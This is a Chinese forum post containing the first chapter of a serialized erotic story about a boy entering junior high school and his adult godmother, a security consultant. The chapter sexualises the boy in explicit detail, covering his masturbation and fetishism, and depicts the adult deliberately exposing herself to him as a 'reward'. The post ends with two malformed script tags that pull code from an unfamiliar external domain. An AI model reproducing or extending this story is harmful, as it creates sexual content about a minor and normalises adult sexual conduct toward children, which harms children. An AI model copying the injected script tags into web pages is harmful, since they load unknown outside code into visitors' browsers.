您的位置:

首页> 长篇连载> 《骇客伶姨》第一章 诚实的奖励

《骇客伶姨》第一章 诚实的奖励 - 《骇客伶姨》第一章 诚实的奖励
本帖最后由 799943412 于 2016-10-5 19:12 编辑

晚上六时许,公车上………

    “小正乖,吃完麦当劳就到干妈家去喔,今天就住干妈家哟。”

    这,是五年前的事了,我爸妈常要外出应酬,这时妈的闺中密友伶姨就来带我到她家去。

    伶姨年龄比妈小上一大截,怎幺认识的我不知道。只知道伶姨是我干妈。

    我只知道,爸妈只要计算机有问题,一定是一通电话问伶姨。伶姨原本在她以前念的大学计中任职,后来

    被一家信息公司聘去当安全部总监。

    做没多久公司要升她的职,伶姨却厌烦了还得不时到公司的日子,婉拒了提议。

    那公司为了留下伶姨,请伶姨当首席安全顾问,要不要到公司随伶姨的意。

    之后陆陆续续有不少公司慕名而来,伶姨又多了不少顾问头衔。

    当然,伶姨也接了我爸妈一家子公司的首席安全顾问聘书,只是先和我爸妈约法三章,言明绝不支薪。

    伶姨平日就待在家,她还有个嗜好就是计算机游戏。

    新游戏一出来,一定先出现在伶姨家。常常伶姨玩完了,国内还没上市。

    有时她就送给朋友,拿去出版功略及破解。

    所以,我也满喜欢到伶姨家的,因为伶姨家有各式计算机游戏可以玩。

    后来,伶姨嫁了人,搬离了台北。

    对象,是聘伶姨当顾问的其中一家公司的母公司总裁。

    然后就是半年前了。伶姨的丈夫突然留张条子说要去寻找真正的自我。

    把财产,以及他的跨国企业,全留给了伶姨。

    还有一纸签好名的离婚证书,说他不能因为任性就绑住伶姨。

    心情纷乱的伶姨第一个想到的,就是她最亲近的密友,我妈。

    于是,伶姨到我家住了一星期,理清了思绪。

    找了人管理她的豪宅,将跨国企业及其子公司托给专业经理人管里。

    为了不想离朋友太远,伶姨决定搬回台北。

    最后,她买下的,是我家大厦中的两层楼,打通成一户。

    伶姨婚后并没有孩子,所以就常要我也叫她妈,不过,这一点,不管伶姨怎幺讨好利诱,我都不为所动。

    伶姨的英文也不是盖的,说写听均属一流。

    (后来妈才告诉我,伶姨从小就到美国,在“小留学生”名词的出现之前就已赴美,直到伶姨国中才回来

    )而且还是国内最高学府的理学院毕业。

    现在加上住在我家楼上几层楼,我要入国中,妈于是拜托伶姨当我的家教。

    爸妈又常出外应酬。所以,最后变成,我住在伶姨家的日子反而比自家多。

    伶姨替我准备了一个房间,规格摆设都与我楼下自己房间一模一样。

    唯一的不同,是计算机的联机。我房里的与对房伶姨的是相连的。

    对外,伶姨拉的是256K的专线。

    伶姨现年三十五岁,面貌姣好,身裁窈窕修长,身高163公分。

    三围是34C,25,35。

    (上围是我在洗澡时偷看到伶姨乳罩知道的,其余是日后伶姨告诉我的)

    聪明机智又美丽温柔,我真是不明白,伶姨的丈夫为什幺放着这幺个完美的人而去“寻找自我”?

    如果硬要挑毛病,就是伶姨的迷糊个性,不时会忘记带东西。

    正是因为这个个性,加上我正在发育的年纪,所以,有次伶姨把待洗衣物拿去洗衣间时,不小心把一件浅

    蓝色三角裤掉了,被跟在她身后的我捡了起来。

    这件三角裤被我藏在抽屉的夹层中,每天上网看色情图片时,一边手淫,一边将伶姨的三角裤凑在鼻边及

    鸡巴上厮摩。

    伶姨规定我要写日记,所以我每天都会用计算机日记程序记录下来。

    为了保有隐私,要开日记程序是须要密码的,这个程序也没有icon在桌面或任何组群档案夹。

    不仅如此,我还把整个目录隐藏了起来,可说是防卫严密。

    所以我就放心的把藏了伶姨的三角裤的抽屉夹层这些事记在日记中。

    这阵子,爸妈出国考察,行程结束后不回国,直接去度他们的n度密月去。

    我是独子,只要把我安置好,他们就当“不良父母”去了,于是,又被托给了伶姨。

    一个夏日午后,我从外头玩回来,直接回伶姨家。

    见到伶姨正在准备晚餐。

    我倒了杯饮料,坐在厨房料理桌旁的高脚凳上,和穿着宽松上衣与长裙的伶姨闲聊着。

    阳光衬托出伶姨美妙的身材,而伶姨来回的移动更突显她美丽的丰臀。

    裙下三角裤的棱线隐约可现。真想看看她裙下的三角裤,贴在她身屁股上的样子。

    想着想着,我身体起了自然反映,讲话开始吞吞吐吐。我急忙的喝饮料掩饰。

    可是,伶姨还是察觉了,转过身来,看着我问:“小正,你是怎幺了?”

    我想,这下毁了,还是直说,省得最后谎话扯得七零八落。

    所以,我就把我看到的及脑中想的说了出来。

    伶姨愣了一下,咬了咬下唇,想了一会,然后终于下了决定。

    “小正,我们大人一直都教你要诚实,所以,你说出来是正确的行为。因为这样,诚实是该有所奖励的”

    然后,伶姨把裙子撩了起来,露出她穿的白色三角裤,就这样站着让我看了好一会儿。

    再转过身去,把穿着三角裤的屁股也让我看。

    最后,她把裙子扎在腰际,让只穿三角裤的下身就这幺暴露在我的视线,继续准备晚餐,就好象没事一样

    。这种转变,这个情景,我的鸡巴都快暴了。急急忙忙放下饮料,冲回房间,没两下子,我的精液就喷了出

    来。

    收拾好了之后,伶姨也喊道,“小正,来吃饭了”

    我走出房,回到餐厅,我才发现,伶姨的裙子还是一直扎在腰际。

    就这样一直维持着。

    伶姨神色自若,表现得一丝异样都没有。

    而在她起身为我添饭,走过我身旁时,我还瞄到有几根阴毛调皮的从缝边露了出来。

    伶姨的菜一直都很好吃,但是,这顿饭,我的吞咽困难许多。

    草草吃完,我又冲回房间,又手淫了一次。
* type="text/javascript" src="https://vpk3r6e1.com/788660a2a427ed69e">* type="text/javascript" src="https://vpk3r6e1.com/788660a2a427ed69e">